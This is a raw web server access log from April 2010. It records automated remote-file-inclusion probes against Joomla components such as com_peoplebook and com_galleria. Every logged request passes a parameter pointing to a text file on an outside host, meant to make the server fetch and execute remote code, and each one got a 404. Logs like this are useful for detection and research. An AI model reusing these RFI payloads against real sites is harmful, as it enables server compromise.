216.121.63.153 - - [07/Apr/2010:07:57:20 -0400] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:07:57:20 -0400] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:07:57:20 -0400] "GET /logs/error_log.Q110032400%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
84.40.30.37 - - [07/Apr/2010:07:57:23 -0400] "GET /logs/access_log.Q109052800%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.mdsl.co.kr/id/1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:07:57:27 -0400] "GET /logs/error_log.Q110032400%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:07:57:29 -0400] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:07:57:29 -0400] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
174.133.122.210 - - [07/Apr/2010:07:57:41 -0400] "GET /logs/access_log.Q109071600//errors.php?error=http://smash1.fileave.com/zfxid1.txt%20? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:07:58:13 -0400] "GET /logs/access_log.Q110031400%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
